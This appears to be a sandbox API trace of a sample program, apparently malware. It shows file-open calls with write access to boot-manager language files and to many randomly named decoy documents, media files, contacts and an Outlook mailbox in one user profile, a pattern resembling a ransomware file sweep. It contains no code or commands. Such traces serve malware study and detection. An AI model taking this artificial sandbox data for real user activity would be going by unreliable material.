Create C:\Boot\ru-RU\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\sv-SE\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\tr-TR\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-CN\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-HK\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Boot\zh-TW\bootmgr.exe.mui desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\NTUSER.DAT desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Aclviho ASldjfl.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\Administrator.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\asdlfk poopvy.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\chucu jadnvk.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\lulcit amkdfe.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Contacts\sikvnb huvuib.contact desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\cPHmz4y9hlXd6trOnGz.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\dSfwXCkwSPKl-.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EDVS.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\frVUZwt9PcEpwFw.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\G0k7.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\GH F.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Gp40F.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\h7iN.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\IcgE7 x.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\K0eRKbFqwJi63h.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\KaYNqgG.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\LS_APPDATA744de46e-2913-4f69-a0ea-d12dff2a5c90SAMPLE.exe desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Ntzf.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Pjxm0.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\sDwPUwZG7wDgXptt.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uJu-CI.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\uZ7jTVGLo.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\vDgHCp4Eu83i9SpY9-10.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\wmwdI-cLzMW1U.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\xZVVdLTP5CRjDGwK.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\_pjDf89YoIOK7INngcQL.swf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\13WDFkzLx13VDvEaH0D.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4Q Yden1pX.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\4zo3jZ4ZhCJWz.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\7SVXau9BM-qAm.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\8OcrQfqf9.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\aHQ0mStm7MOUQz8p.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\c74ORtbzoKEgt1tULZrF.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Eiz2OkszASes0dl.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\G5QwtEl2iSslGa.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\ixHgNpSkmetkMwk0N.doc desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\jLUC 3.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mMGsDdpRxCcIwjb.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\mXYQzNZWY3_pbSh7dVoS.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rOeN9J2zJO_02nt1ly.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\rrn5_p.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Sh2l9d6EAI4aRt7OOr6g.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\tJLm4JiczASJ_8Z0U3i.ots desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\uJO-YiH9NhpREYVYgJi.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\VJH-kfHp7SFpre94.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\wZOz3j2ll6HfOuxlg93b.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\x7bIgakKt.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\XhDBm5L_.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\yB0OOX Rk5q.pptx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\_7Xr5yfzUYNnPcQwSd50.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\-GcGxMxOZK4.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\07G0ZL7bvnBKvt7n.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\1tk99aXbfw9RlvqZV.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\8HrfWqZar65w.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\bS4AaW9eUKRKSJX2c.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\eySD-sWxKcR.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\FB pP.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\FC0AY.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\FiSO1uvHs5.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\fQh6.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\g9mcoi9dYhMEy.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\H94nos6VqWF8Oqje.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\H99vbmXS7JVu8GvPT.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\hf0MR7KC2v0S0EFbF.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\j nRVt1oLEKKj.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\jgXL.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\MyJjOnayKnFCwyo3.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\nh7G7MoNq.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\NTjyCO-pmQ3AS.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\O841-zc0Cz.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\PBGnAJbjKeNYoVmuXsp.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\POR XU-fcmkfoFYhwpS_.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\ptcryHpXY3gBNb.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\qpbO.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\S4IWsPZvnadFRmzK.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\SIP IIj4TyP2E.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\SOIg.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\SpwIY0qQ5DxtnlG-Nb.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\th0xZ3rZW1yj.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\unP_Med.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\wcuQuzjX.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\WqT6i1.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\y9xtUA5iI6IPOKUD.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z3UK3vFO8h-zCs4j.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\ZBi4Ka.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\zyzE7.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Music\_wiR1L3MR2ebfVeG.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\3vMt_2q3fAah.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\CrjCu6i aZorUJcYh.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\IblMdY4N1yG.bmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Everywhere.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Searches\Indexed Locations.search-ms desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\eFGyeqngF0yupS6aQiTk.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HuEJMg3KiSp.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\0JOcjFAlZN.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\7H07rLnEi4jFThR2aq.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\ceQR-g1K.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Gtis3rDzqOHJLSemRMN.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\hjjmc6wvdBzNble_jQ.m4a desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\IqxOJCjnMrxHR71kHDep.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\KMX9gyhiVByA4.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\rX Jr.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\sKevCgi1Mzg9JDdGUMsM.flv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\0d9kggXW.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\aFuREbY291J9.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\bhC_ABvBjR.ods desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\hK5LQd-AxtZKvzbn.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\lbsR.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\mdkvH5k.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\pelEM3i4e4Jx_4 Wkx.pdf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\Favorites.vss desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
